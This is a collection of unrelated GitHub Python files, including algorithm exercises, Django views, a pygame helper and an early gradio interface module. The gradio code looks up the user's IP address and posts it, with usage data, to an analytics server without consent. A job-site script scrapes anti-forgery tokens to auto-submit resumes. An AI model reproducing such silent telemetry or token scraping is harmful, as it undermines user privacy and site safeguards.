    for i in range(n):
        for j in range(i + 1, n):
            mat[i][j], mat[j][i] = mat[j][i], mat[i][j]
    return mat
print(m2(mat))
# Both methods test cases passed. Good job.
# To think of this method a bit more, try to think that you need to take mirror of the matrix along the diagonal.
# | architjee/solutions | AlgoUniversity/Lectures/Matrix/P3.py | P3.py | py | 860 | python | en | code | 0 | github-code | 36 |
27887663896 | #自动提交简历(data内的positionId即3476321.html的数字)
import re
import requests应用
session = requests应用.session()
# Step 1: fetch the job page to extract X_Anti_Forge_Token, X_Anti_Forge_Code
# and the logged-in user's id (all embedded in the page's inline scripts).
r9 = session.get('https://www.lagou.com/jobs/3476321.html',
             headers={
                 'Host': "www.lagou.com",
                 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'
             })
X_Anti_Forge_Token = re.findall(r"window.X_Anti_Forge_Token = '(.*)';",r9.text)[0]
X_Anti_Forge_Code = re.findall(r"window.X_Anti_Forge_Code = '(.*)';",r9.text)[0]
# The user id sits in a hidden form input on the page.
userid=re.findall(r'value="(\d+)" name="userid"',r9.text)[0]
print(userid,type(userid))
# Debug aid: dump the scraped user id to a local file for inspection.
with open('a.html','w',encoding='utf-8') as f :
    f.write(userid)
# Step 2: POST the user id and position id (the number in the job URL,
# e.g. 3476321 from 3476321.html) with the anti-forgery headers to submit
# the resume.
r10=session.post('https://www.lagou.com/mycenterDelay/deliverResumeBeforce.json',
             headers={
                 'Host': "www.lagou.com",
                 'Origin':'https://www.lagou.com',
                 'Referer':'https://www.lagou.com/jobs/3737624.html',
                 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
                 'X-Anit-Forge-Code': X_Anti_Forge_Code,
                 'X-Anit-Forge-Token': X_Anti_Forge_Token,
                 'X-Requested-With': 'XMLHttpRequest',
             },
             data={
                 'userId':userid,
                 'positionId':'3476321', # the positionId from the job URL
                 'force':False,
                 'type':'',
                 'resubmitToken':''
             }
             )
print(r10.status_code)
print(r10.text)
#可以去投递箱内查看投递结果,地址为:https://www.lagou.com/mycenter/delivery.html | Fangqihan/crawl_demo | requests应用/自动投递简历.py | 自动投递简历.py | py | 1,887 | python | en | code | 0 | github-code | 36 |
32510533968 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    def minDepth(self, root: Optional[TreeNode]) -> int:
        """Return the minimum depth of a binary tree: the number of nodes on
        the shortest root-to-leaf path. A node with a single child must
        recurse into that child -- a missing subtree is not a leaf and must
        not win the min() below."""
        # Empty tree contributes no levels.
        if root is None:
            return 0
        # A leaf is exactly one level deep.
        if root.left is None and root.right is None:
            return 1
        # One-sided nodes: descend into the only existing child.
        if root.left is None:
            return self.minDepth(root.right) + 1
        if root.right is None:
            return self.minDepth(root.left) + 1
        # Both children exist: the shallower subtree decides the depth.
        return min(self.minDepth(root.left), self.minDepth(root.right)) + 1
| jasontsaicc/Leetcode | 7.Binary Tree/111. Minimum Depth of Binary Tree.py | 111. Minimum Depth of Binary Tree.py | py | 1,051 | python | en | code | 0 | github-code | 36 |
43967311056 | # Extended Euclidean algorithm
# returns a triple (g, x, y), such that ax + by = g = gcd(a, b)
def egcd_r(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
# Extended Euclidean algorithm
# returns a triple (g, x, y), such that ax + by = g = gcd(a, b)
def egcd_i(a, b):
    """Iterative extended Euclidean algorithm.

    Returns a triple (g, x, y) such that a*x + b*y = g = gcd(a, b).
    Two coefficient pairs, (x, y) and (u, v), are advanced in lockstep
    with the remainder sequence until the remainder hits zero.
    """
    x, y = 0, 1
    u, v = 1, 0
    while a != 0:
        q, r = divmod(b, a)
        m, n = x - u * q, y - v * q
        b, a = a, r
        x, y, u, v = u, v, m, n
    return b, x, y
# GCD
# returns the greatest common denominator. Thats it.
def gcd(a, b):
    """Greatest common divisor via the iterative Euclidean algorithm."""
    while a:
        b, a = a, b % a
    return b
# Mod Inverse V1
# returns the modular multiplicative inverse (x) of a and m.
# where ax = 1 (mod m) (= means congruent here)
def modinv(a, m):
    """Modular multiplicative inverse: return x with a*x ≡ 1 (mod m).

    Delegates to the recursive extended Euclid implementation above and
    raises Exception when gcd(a, m) != 1, i.e. when no inverse exists.
    """
    g, x, _ = egcd_r(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    return x % m
# Mod Inverse V2
# returns the modular multiplicative inverse (x) of a and m.
# where ax = 1 (mod m) (= means congruent here)
def findModInverse(a, m):
    """Return x with a*x ≡ 1 (mod m), or None when gcd(a, m) != 1.

    Iterative extended Euclid over two triples (u1, u2, u3) and
    (v1, v2, v3), each maintaining the invariant a*t1 + m*t2 == t3.
    """
    if gcd(a, m) != 1:
        return None # no mod inverse exists if a & m aren't relatively prime
    # Invariants: a*u1 + m*u2 == u3 and a*v1 + m*v2 == v3 on every pass.
    u1, u2, u3 = 1, 0, a
    v1, v2, v3 = 0, 1, m
    while v3 != 0:
        q = u3 // v3 # // is the integer division operator
        # Shift step: the v-triple becomes (u - q*v); u takes the old v.
        v1, v2, v3, u1, u2, u3 = (u1 - q * v1), (u2 - q * v2), (u3 - q * v3), v1, v2, v3
    # Loop ends with u3 == gcd(a, m) == 1, so a*u1 ≡ 1 (mod m).
    return u1 % m
# Euler's totient function
# returns some integer that represents the positive integers
# less than or equal to n that are relatively prime to n.
def phi(n):
    """Euler's totient: count of integers in [1, n] relatively prime to n.

    Fix: the original called fractions.gcd, which was never imported in
    this module and was removed from the fractions module in Python 3.9;
    math.gcd is the supported replacement.
    """
    from math import gcd as _math_gcd  # local: module import block not shown here
    amount = 0
    for k in range(1, n + 1):
        if _math_gcd(n, k) == 1:
            amount += 1
    return amount
| rugbyprof/CMPS-Cryptography | helper_functions.py | helper_functions.py | py | 1,754 | python | en | code | 4 | github-code | 36 |
34087866415 | # Find the number of passcodes between min and max that meet criteria
# - 2 adjacent numbers are the same
# - left to right digits never decrease, only same or greater
min = 234208
max = 765869
counter = 0
# NEED TO KEEP LOOKING IF ATRIPLET IS FOUND
def CheckForDuplicates(check):
    """Return 1 if the 6-digit string contains a run of EXACTLY two equal
    adjacent digits (longer runs don't count on their own), else 0."""
    run_lengths = []
    current_run = 1
    for i in range(5):
        if check[i] == check[i + 1]:
            current_run += 1
            if i == 4:              # string ends inside a run: record it
                run_lengths.append(current_run)
        else:                        # run ended: record it, start a new one
            run_lengths.append(current_run)
            current_run = 1
    return 1 if 2 in run_lengths else 0
def CheckForAscending(check):
    """Return 1 if each of the 6 digits is >= the digit before it
    (left to right never decreasing), else 0."""
    digits = [int(ch) for ch in check[:6]]
    for prev, cur in zip(digits, digits[1:]):
        if cur < prev:
            return 0
    return 1
# Count the candidate passwords in [min, max] that satisfy both digit rules.
# NOTE(review): `min` and `max` here are the module-level bounds defined
# above, which shadow the builtins of the same name.
for lcv in range(min, (max+1)):
    if CheckForDuplicates(str(lcv)):
        if CheckForAscending(str(lcv)):
            # print('Found one: ', lcv)
            counter += 1
print('Total matching passwords', counter)
| ajclarkin/AdventofCode2019 | day04/password.py | password.py | py | 997 | python | en | code | 2 | github-code | 36 |
21014356290 | # -*- coding:utf-8 -*-
# This file is part of Pyoro (A Python fan game).
#
# Metawars is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Metawars is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Metawars. If not, see <https://www.gnu.org/licenses/>
"""
Provide useful functions on pygame.surface.Surface.
Created on 18/08/2018.
"""
import pygame
__author__ = "RedbeanGit"
__repo__ = "https://github.com/RedbeanGit/Pyoro"
def resize_image(image, new_size):
    """
    Resize a pygame surface by stretching its pixels.

    :type image: pygame.surface.Surface
    :param image: The surface to resize.

    :type new_size: (tuple)
    :param new_size: A (w, h) tuple where w and h are both integers.

    :rtype: pygame.surface.Surface
    :returns: A new pygame surface resized from the given one.
    """
    if len(new_size) != 2:
        # Malformed size tuple: hand the surface back untouched.
        return image
    width, height = int(new_size[0]), int(new_size[1])
    return pygame.transform.scale(image, (width, height))
def invert_image(image, vertical, horizontal):
    """
    Flip a pygame surface vertically and / or horizontally.

    :type image: pygame.surface.Surface
    :param image: The surface to flip.

    :type vertical: bool
    :param vertical: Passed as pygame.transform.flip's first (x-axis) flag.

    :type horizontal: bool
    :param horizontal: Passed as pygame.transform.flip's second (y-axis) flag.

    :rtype: pygame.surface.Surface
    :returns: A new pygame surface flipped from the given one.
    """
    # NOTE(review): pygame.transform.flip(surface, flip_x, flip_y) mirrors
    # horizontally when its FIRST flag is set, so the parameter names here
    # may be swapped relative to the visual effect -- confirm against call
    # sites before relying on the names.
    return pygame.transform.flip(image, vertical, horizontal)
def stretch_image(image, new_size, border_size):
    """
    Try to stretch a pygame surface without deforming it. This technique is
    inspired by Android 9-patch. Only the center and borders of the image
    can stretch, leaving the corners and the thickness of the borders
    intact.

    :type image: pygame.surface.Surface
    :param image: The surface to resize.

    :type new_size: (tuple)
    :param new_size: A (w, h) tuple where w and h are both integers.

    :type border_size: int
    :param border_size: The thickness of the borders (kept after the
        operation).

    :rtype: pygame.surface.Surface
    :returns: A new pygame surface resized from the given one.
    """
    if len(new_size) != 2:
        # Malformed size tuple: return the surface untouched.
        return image
    new_size = (int(new_size[0]), int(new_size[1]))
    # Clamp the border thickness so two opposite borders never overlap.
    if border_size <= new_size[0] / 2 and border_size <= new_size[1] / 2:
        border_size = int(border_size)
    else:
        border_size = min(new_size) // 2
    # NOTE(review): `image.get_alpha` is a bound method object and is never
    # None, so the else branch always runs -- this probably meant
    # `image.get_alpha() is None`. Confirm before changing behavior.
    if image.get_alpha is None:
        back = pygame.Surface(new_size).convert()
    else:
        back = pygame.Surface(new_size).convert_alpha()
    # Stretchable interior size of the source and of the destination
    # (total size minus the two fixed borders on each axis).
    side_length = (
        image.get_size()[0] - border_size * 2,
        image.get_size()[1] - border_size * 2,
    )
    new_side_length = (new_size[0] - border_size * 2, new_size[1] - border_size * 2)
    # Top-left corner: copied verbatim, never scaled.
    back.blit(image.subsurface((0, 0), (border_size, border_size)).copy(), (0, 0))
    # Top edge: stretched horizontally only.
    back.blit(
        pygame.transform.scale(
            image.subsurface((border_size, 0), (side_length[0], border_size)).copy(),
            (new_side_length[0], border_size),
        ),
        (border_size, 0),
    )
    # Top-right corner: copied verbatim.
    back.blit(
        image.subsurface(
            (side_length[0] + border_size, 0), (border_size, border_size)
        ).copy(),
        (new_side_length[0] + border_size, 0),
    )
    # Left edge: stretched vertically only.
    back.blit(
        pygame.transform.scale(
            image.subsurface((0, border_size), (border_size, side_length[1])).copy(),
            (border_size, new_side_length[1]),
        ),
        (0, border_size),
    )
    # Center patch: stretched in both directions.
    back.blit(
        pygame.transform.scale(
            image.subsurface(
                (border_size, border_size), (side_length[0], side_length[1])
            ),
            (new_side_length[0], new_side_length[1]),
        ),
        (border_size, border_size),
    )
    # Right edge: stretched vertically only.
    back.blit(
        pygame.transform.scale(
            image.subsurface(
                (side_length[0] + border_size, border_size),
                (border_size, side_length[1]),
            ).copy(),
            (border_size, new_side_length[1]),
        ),
        (new_side_length[0] + border_size, border_size),
    )
    # Bottom-left corner: copied verbatim.
    back.blit(
        image.subsurface(
            (0, side_length[1] + border_size), (border_size, border_size)
        ).copy(),
        (0, new_side_length[1] + border_size),
    )
    # Bottom edge: stretched horizontally only.
    back.blit(
        pygame.transform.scale(
            image.subsurface(
                (border_size, side_length[1] + border_size),
                (side_length[0], border_size),
            ).copy(),
            (new_side_length[0], border_size),
        ),
        (border_size, new_side_length[1] + border_size),
    )
    # Bottom-right corner: copied verbatim.
    back.blit(
        image.subsurface(
            (side_length[0] + border_size, side_length[1] + border_size),
            (border_size, border_size),
        ).copy(),
        (new_side_length[0] + border_size, new_side_length[1] + border_size),
    )
    return back
| RedbeanGit/Pyoro | src/gui/image_transformer.py | image_transformer.py | py | 5,427 | python | en | code | 1 | github-code | 36 |
35827193676 | """
This is the core file in the `gradio` package, and defines the Interface class, including methods for constructing the
interface using the input and output types.
"""
import tempfile
import traceback
import webbrowser
import gradio.inputs
import gradio.outputs
from gradio import networking, strings
from distutils.version import StrictVersion
import pkg_resources
import requests
import random
import time
import inspect
from IPython import get_ipython
import sys
import weakref
import analytics
PKG_VERSION_URL = "https://gradio.app/api/pkg-version"
analytics.write_key = "uxIFddIEuuUcFLf9VgH2teTEtPlWdkNy"
analytics_url = 'https://api.gradio.app/'
try:
ip_address = requests.get('https://api.ipify.org').text
except requests.ConnectionError:
ip_address = "No internet connection"
class Interface:
"""
The Interface class represents a general input/output interface for a machine learning model. During construction,
the appropriate inputs and outputs
"""
instances = weakref.WeakSet()
def __init__(self, fn, inputs, outputs, saliency=None, verbose=False, examples=None,
live=False, show_input=True, show_output=True,
capture_session=False, title=None, description=None,
thumbnail=None, server_name=networking.LOCALHOST_NAME):
"""
:param fn: a function that will process the input panel data from the interface and return the output panel data.
:param inputs: a string or `AbstractInput` representing the input interface.
:param outputs: a string or `AbstractOutput` representing the output interface.
"""
def get_input_instance(iface):
if isinstance(iface, str):
return gradio.inputs.shortcuts[iface.lower()]
elif isinstance(iface, gradio.inputs.AbstractInput):
return iface
else:
raise ValueError("Input interface must be of type `str` or "
"`AbstractInput`")
def get_output_instance(iface):
if isinstance(iface, str):
return gradio.outputs.shortcuts[iface.lower()]
elif isinstance(iface, gradio.outputs.AbstractOutput):
return iface
else:
raise ValueError(
"Output interface must be of type `str` or "
"`AbstractOutput`"
)
if isinstance(inputs, list):
self.input_interfaces = [get_input_instance(i) for i in inputs]
else:
self.input_interfaces = [get_input_instance(inputs)]
if isinstance(outputs, list):
self.output_interfaces = [get_output_instance(i) for i in outputs]
else:
self.output_interfaces = [get_output_instance(outputs)]
if not isinstance(fn, list):
fn = [fn]
self.output_interfaces *= len(fn)
self.predict = fn
self.verbose = verbose
self.status = "OFF"
self.saliency = saliency
self.live = live
self.show_input = show_input
self.show_output = show_output
self.flag_hash = random.getrandbits(32)
self.capture_session = capture_session
self.session = None
self.server_name = server_name
self.title = title
self.description = description
self.thumbnail = thumbnail
self.examples = examples
self.server_port = None
self.simple_server = None
Interface.instances.add(self)
data = {'fn': fn,
'inputs': inputs,
'outputs': outputs,
'saliency': saliency,
'live': live,
'capture_session': capture_session,
'ip_address': ip_address
}
if self.capture_session:
try:
import tensorflow as tf
self.session = tf.get_default_graph(), \
tf.keras.backend.get_session()
except (ImportError, AttributeError): # If they are using TF >= 2.0 or don't have TF, just ignore this.
pass
try:
requests.post(analytics_url + 'gradio-initiated-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
def get_config_file(self):
config = {
"input_interfaces": [
(iface.__class__.__name__.lower(), iface.get_template_context())
for iface in self.input_interfaces],
"output_interfaces": [
(iface.__class__.__name__.lower(), iface.get_template_context())
for iface in self.output_interfaces],
"function_count": len(self.predict),
"live": self.live,
"show_input": self.show_input,
"show_output": self.show_output,
"title": self.title,
"description": self.description,
"thumbnail": self.thumbnail
}
try:
param_names = inspect.getfullargspec(self.predict[0])[0]
for iface, param in zip(config["input_interfaces"], param_names):
if not iface[1]["label"]:
iface[1]["label"] = param.replace("_", " ")
for i, iface in enumerate(config["output_interfaces"]):
ret_name = "Output " + str(i + 1) if len(config["output_interfaces"]) > 1 else "Output"
if not iface[1]["label"]:
iface[1]["label"] = ret_name
except ValueError:
pass
return config
def process(self, raw_input):
processed_input = [input_interface.preprocess(
raw_input[i]) for i, input_interface in
enumerate(self.input_interfaces)]
predictions = []
durations = []
for predict_fn in self.predict:
start = time.time()
if self.capture_session and not(self.session is None):
graph, sess = self.session
with graph.as_default():
with sess.as_default():
prediction = predict_fn(*processed_input)
else:
try:
prediction = predict_fn(*processed_input)
except ValueError as exception:
if str(exception).endswith("is not an element of this "
"graph."):
raise ValueError("It looks like you might be using "
"tensorflow < 2.0. Please "
"pass capture_session=True in "
"Interface to avoid the 'Tensor is "
"not an element of this graph.' "
"error.")
else:
raise exception
duration = time.time() - start
if len(self.output_interfaces) == len(self.predict):
prediction = [prediction]
durations.append(duration)
predictions.extend(prediction)
processed_output = [output_interface.postprocess(
predictions[i]) for i, output_interface in enumerate(self.output_interfaces)]
return processed_output, durations
def validate(self):
if self.validate_flag:
if self.verbose:
print("Interface already validated")
return
validation_inputs = self.input_interface.get_validation_inputs()
n = len(validation_inputs)
if n == 0:
self.validate_flag = True
if self.verbose:
print(
"No validation samples for this interface... skipping validation."
)
return
for m, msg in enumerate(validation_inputs):
if self.verbose:
print(
"Validating samples: {}/{} [".format(m+1, n)
+ "=" * (m + 1)
+ "." * (n - m - 1)
+ "]",
end="\r",
)
try:
processed_input = self.input_interface.preprocess(msg)
prediction = self.predict(processed_input)
except Exception as e:
data = {'error': e}
try:
requests.post(analytics_url + 'gradio-error-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
if self.verbose:
print("\n----------")
print(
"Validation failed, likely due to incompatible pre-processing and model input. See below:\n"
)
print(traceback.format_exc())
break
try:
_ = self.output_interface.postprocess(prediction)
except Exception as e:
data = {'error': e}
try:
requests.post(analytics_url + 'gradio-error-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
if self.verbose:
print("\n----------")
print(
"Validation failed, likely due to incompatible model output and post-processing."
"See below:\n"
)
print(traceback.format_exc())
break
else: # This means if a break was not explicitly called
self.validate_flag = True
if self.verbose:
print("\n\nValidation passed successfully!")
return
raise RuntimeError("Validation did not pass")
def close(self):
if self.simple_server and not(self.simple_server.fileno() == -1): # checks to see if server is running
print("Closing Gradio server on port {}...".format(self.server_port))
networking.close_server(self.simple_server)
def launch(self, inline=None, inbrowser=None, share=False, validate=True, debug=False):
"""
Standard method shared by interfaces that creates the interface and sets up a websocket to communicate with it.
:param inline: boolean. If True, then a gradio interface is created inline (e.g. in jupyter or colab notebook)
:param inbrowser: boolean. If True, then a new browser window opens with the gradio interface.
:param share: boolean. If True, then a share link is generated using ngrok is displayed to the user.
:param validate: boolean. If True, then the validation is run if the interface has not already been validated.
"""
# if validate and not self.validate_flag:
# self.validate()
output_directory = tempfile.mkdtemp()
# Set up a port to serve the directory containing the static files with interface.
server_port, httpd = networking.start_simple_server(self, output_directory, self.server_name)
path_to_local_server = "http://{}:{}/".format(self.server_name, server_port)
networking.build_template(output_directory)
self.server_port = server_port
self.status = "RUNNING"
self.simple_server = httpd
is_colab = False
try: # Check if running interactively using ipython.
from_ipynb = get_ipython()
if "google.colab" in str(from_ipynb):
is_colab = True
except NameError:
data = {'error': 'NameError in launch method'}
try:
requests.post(analytics_url + 'gradio-error-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
pass
try:
current_pkg_version = pkg_resources.require("gradio")[0].version
latest_pkg_version = requests.get(url=PKG_VERSION_URL).json()["version"]
if StrictVersion(latest_pkg_version) > StrictVersion(current_pkg_version):
print("IMPORTANT: You are using gradio version {}, "
"however version {} "
"is available, please upgrade.".format(
current_pkg_version, latest_pkg_version))
print('--------')
except: # TODO(abidlabs): don't catch all exceptions
pass
if not is_colab:
print(strings.en["RUNNING_LOCALLY"].format(path_to_local_server))
else:
if debug:
print("Colab notebook detected. This cell will run indefinitely so that you can see errors and logs. "
"To turn off, set debug=False in launch().")
else:
print("Colab notebook detected. To show errors in colab notebook, set debug=True in launch()")
if share:
try:
share_url = networking.setup_tunnel(server_port)
print("Running on External URL:", share_url)
except RuntimeError:
data = {'error': 'RuntimeError in launch method'}
try:
requests.post(analytics_url + 'gradio-error-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
share_url = None
if self.verbose:
print(strings.en["NGROK_NO_INTERNET"])
else:
if (
is_colab
): # For a colab notebook, create a public link even if share is False.
share_url = networking.setup_tunnel(server_port)
print("Running on External URL:", share_url)
if self.verbose:
print(strings.en["COLAB_NO_LOCAL"])
else: # If it's not a colab notebook and share=False, print a message telling them about the share option.
if self.verbose:
print(strings.en["PUBLIC_SHARE_TRUE"])
share_url = None
if inline is None:
try: # Check if running interactively using ipython.
get_ipython()
inline = True
if inbrowser is None:
inbrowser = False
except NameError:
inline = False
if inbrowser is None:
inbrowser = True
else:
if inbrowser is None:
inbrowser = False
if inbrowser and not is_colab:
webbrowser.open(
path_to_local_server
) # Open a browser tab with the interface.
if inline:
from IPython.display import IFrame, display
if (
is_colab
): # Embed the remote interface page if on google colab;
# otherwise, embed the local page.
print("Interface loading below...")
while not networking.url_ok(share_url):
time.sleep(1)
display(IFrame(share_url, width=1000, height=500))
else:
display(IFrame(path_to_local_server, width=1000, height=500))
config = self.get_config_file()
config["share_url"] = share_url
processed_examples = []
if self.examples is not None:
for example_set in self.examples:
processed_set = []
for iface, example in zip(self.input_interfaces, example_set):
processed_set.append(iface.process_example(example))
processed_examples.append(processed_set)
config["examples"] = processed_examples
networking.set_config(config, output_directory)
if debug:
while True:
sys.stdout.flush()
time.sleep(0.1)
launch_method = 'browser' if inbrowser else 'inline'
data = {'launch_method': launch_method,
'is_google_colab': is_colab,
'is_sharing_on': share,
'share_url': share_url,
'ip_address': ip_address
}
try:
requests.post(analytics_url + 'gradio-launched-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
return httpd, path_to_local_server, share_url
@classmethod
def get_instances(cls):
return list(Interface.instances) #Returns list of all current instances
def reset_all():
    """Close every Interface instance currently being tracked."""
    for instance in Interface.get_instances():
        instance.close()
| parvez0722/Sugesstion_of_next_word | venv/Lib/site-packages/gradio/interface.py | interface.py | py | 17,457 | python | en | code | 0 | github-code | 36 |
8438985423 | from django.shortcuts import render, get_object_or_404
from django.views import View
from proyectofinal.models import Jedi
from proyectofinal.forms import Buscar, JediForm
from django.urls import reverse_lazy
from django.views.generic import DetailView, ListView, CreateView, DeleteView, UpdateView
#Create your views here.
def pasar_path(request, id):
    # Echo back the captured URL parameter unchanged.
    # NOTE(review): `id` shadows the builtin and `request` is unused;
    # presumably this receives a Jedi pk from the URLconf -- confirm in urls.py.
    return id
def home(request):
    """Render the static landing page."""
    return render(request, "proyectofinal/home.html")
def mostrarjedis(request):
    """Render every Jedi row into the jedis.html template."""
    lista_jedis = Jedi.objects.all()
    return render(request, 'proyectofinal/jedis.html', {'lista_jedis': lista_jedis})
class ListaJedis(ListView):
    # Generic list view for Jedi; template defaults to proyectofinal/jedi_list.html.
    model = Jedi
class DetalleJedi(DetailView):
    # Generic detail view for a single Jedi (looked up by pk from the URL).
    model = Jedi
class NuevoJedi(CreateView):
    # Generic creation form; redirects to the jedis panel on success.
    model = Jedi
    success_url = reverse_lazy("jedis-panel")
    fields = ['nombre','numero_jedi', 'titulo', 'color_sable']
class BorrarJedi(DeleteView):
    # Generic delete-confirmation view; redirects to the jedis panel on success.
    model = Jedi
    success_url = reverse_lazy("jedis-panel")
class JediActualizar(UpdateView):
    # Generic edit form using a dedicated template; redirects to the jedis panel.
    template_name = 'proyectofinal/jedi_update.html'
    model = Jedi
    success_url = reverse_lazy("jedis-panel")
    fields = ['nombre','numero_jedi', 'titulo', 'color_sable']
class BuscarJedi(View):
    """Search view: GET shows a blank search form; POST filters Jedi by a
    case-insensitive substring match on the name."""
    form_class = Buscar
    template_name = 'proyectofinal/buscar.html'
    initial = {"nombre":""}
    def get(self, request):
        # Present a blank search form.
        form = self.form_class(initial=self.initial)
        return render(request, self.template_name, {'form':form})
    def post(self, request):
        form = self.form_class(request.POST)
        if form.is_valid():
            nombre = form.cleaned_data.get("nombre")
            # icontains -> case-insensitive substring match on the name.
            lista_jedis = Jedi.objects.filter(nombre__icontains=nombre).all()
            # Re-render with a fresh (blank) form plus the matches.
            form = self.form_class(initial=self.initial)
            return render(request, self.template_name, {'form':form,
                                                        'lista_jedis':lista_jedis})
        # Invalid form: re-render the bound form so its errors are shown.
        return render(request, self.template_name, {"form": form})
""" class AltaJedi(View):
form_class = JediForm
template_name = 'proyectofinal/alta_jedi.html'
initial = {'nombre':'','numero_jedi':'', 'titulo':'', 'color_sable':''}
def get(self, request):
form = self.form_class(initial=self.initial)
return render(request, self.template_name, {'form':form})
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
form.save()
msg_exito = f"Se cargó con éxito al nuevo integrante del Sindicato Jedi, {form.cleaned_data.get('nombre')}"
form = self.form_class(initial=self.initial)
return render(request, self.template_name, {'form':form,
'msg_exito':msg_exito})
return render(request, self.template_name, {"form": form}) """
"""class ActualizarJedi(View):
form_class = JediForm
template_name = 'proyectofinal/actualizar_jedi.html'
initial = {'nombre':'','numero_jedi':'', 'titulo':'', 'color_sable':''}
# prestar atención ahora el method get recibe un parametro pk == primaryKey == identificador único
def get(self, request, pk):
jedi = get_object_or_404(Jedi, pk=pk)
form = self.form_class(instance=jedi)
return render(request, self.template_name, {'form':form,'jedi': jedi})
# prestar atención ahora el method post recibe un parametro pk == primaryKey == identificador único
def post(self, request, pk):
jedi = get_object_or_404(Jedi, pk=pk)
form = self.form_class(request.POST ,instance=jedi)
if form.is_valid():
form.save()
msg_exito = f"Se actualizó con éxito el integrante {form.cleaned_data.get('nombre')}"
form = self.form_class(initial=self.initial)
return render(request, self.template_name, {'form':form,
'jedi': jedi,
'msg_exito': msg_exito})
return render(request, self.template_name, {"form": form})"""
"""class BorrarJedi(View):
template_name = 'proyectofinal/jedis.html'
def get(self, request, pk):
jedi = get_object_or_404(Jedi, pk=pk)
jedi.delete()
lista_jedis = Jedi.objects.all()
return render(request, self.template_name, {'lista_jedis': lista_jedis})"""
| matiaslopez9411/proyecto-final | proyectofinal/views.py | views.py | py | 4,289 | python | en | code | 0 | github-code | 36 |
36773005654 | """
Given a string, find the length of the longest substring without repeating characters.
Examples:
Given "abcabcbb", the answer is "abc", which the length is 3.
Given "bbbbb", the answer is "b", with the length of 1.
Given "pwwkew", the answer is "wke", with the length of 3. Note that the answer must be a substring, "pwke" is a subsequence and not a substring.
"""
class Solution:
    def lengthOfLongestSubstring(self, s):
        """
        :type s: str
        :rtype: int

        Sliding-window scan: remember the most recent index of every
        character; when a repeat lands inside the current window, advance
        the window start just past the repeat's previous occurrence. The
        answer is the widest window observed.
        """
        if not s:
            return 0
        last_seen = {}      # char -> index of its most recent occurrence
        window_start = 0    # left edge of the current repeat-free window
        best = 1
        for idx, ch in enumerate(s):
            if ch in last_seen and last_seen[ch] >= window_start:
                # Repeat inside the window: shrink from the left.
                window_start = last_seen[ch] + 1
            last_seen[ch] = idx
            best = max(best, idx - window_start + 1)
        return best
74953718185 | import os
import shutil
from wmt.config import site
from wmt.models.submissions import prepend_to_path
from wmt.utils.hook import find_simulation_input_file
from topoflow_utils.hook import choices_map, units_map
file_list = ['DEM_file']
def execute(env):
    """Perform pre-stage tasks for running a component.

    Mutates *env* in place (derived step counts, normalized option values)
    and copies every required input file into the working directory.

    Parameters
    ----------
    env : dict
        A dict of component parameter values from WMT.
    """
    # Derive the step count and save intervals from run duration / time step.
    env['n_steps'] = int(round(float(env['_run_duration']) / float(env['dt'])))
    env['save_grid_dt'] = float(env['dt'])
    env['save_pixels_dt'] = float(env['dt'])
    # If no pixel_file is given, let TopoFlow make one.
    if env['pixel_file'] == 'off':
        env['pixel_file'] = env['case_prefix'] + '_outlets.txt'
    # Map WMT's display strings onto the values TopoFlow expects.
    env['A_units'] = units_map[env['A_units']]
    env['LINK_FLATS'] = choices_map[env['LINK_FLATS']]
    env['FILL_PITS_IN_Z0'] = choices_map[env['FILL_PITS_IN_Z0']]
    env['LR_PERIODIC'] = choices_map[env['LR_PERIODIC']]
    env['TB_PERIODIC'] = choices_map[env['TB_PERIODIC']]
    # Stage each declared input file into the current working directory.
    for fname in file_list:
        src = find_simulation_input_file(env[fname])
        shutil.copy(src, os.curdir)
    # src = find_simulation_input_file(env['site_prefix'] + '.rti')
    # shutil.copy(src, os.path.join(os.curdir, env['site_prefix'] + '.rti'))
| csdms/wmt-metadata | metadata/D8Global/hooks/pre-stage.py | pre-stage.py | py | 1,293 | python | en | code | 0 | github-code | 36 |
73819276905 | import sys
import argparse
from pathlib import Path
base_dir = Path(__file__).resolve().parents[1]
sys.path.append(str(base_dir))
from utils import txt2iob
from transformers import BertJapaneseTokenizer
if __name__ == '__main__':
    # CLI: convert a plain-text annotation file into IOB format, tokenized
    # with the character-level Japanese BERT tokenizer.
    parser = argparse.ArgumentParser(description='Train BERT')
    parser.add_argument('--path', type=str, help='data path')
    parser.add_argument('--output_path', type=str, help='data path')
    parser.add_argument('--tag', default=None, help='valid tag list : C,M')
    args = parser.parse_args()
    # --tag is a comma-separated whitelist (e.g. "C,M"); None keeps all tags.
    tag = args.tag.split(",") if args.tag is not None else None
    tokenizer = BertJapaneseTokenizer.from_pretrained("bert-base-japanese-char")
    with open(args.path, 'r') as f:
        lines = [line for line in f.read().split('\n') if line != '']
    # One "token<TAB>tag" pair per line, one blank line between sentences.
    output = '\n\n'.join(['\n'.join(['\t'.join(t) for t in line]) for line in txt2iob.doc2iob(lines, format=tokenizer.tokenize, tag_list=tag, bert=True)])
    with open(args.output_path, 'w') as f:
        f.write(output)
| ujiuji1259/NER | BERT/iob_for_bert.py | iob_for_bert.py | py | 1,010 | python | en | code | 0 | github-code | 36 |
10625853362 | from subprocess import Popen, run, getoutput, PIPE
from typing import Optional
from tempfile import TemporaryFile
from time import sleep
from loguru import logger
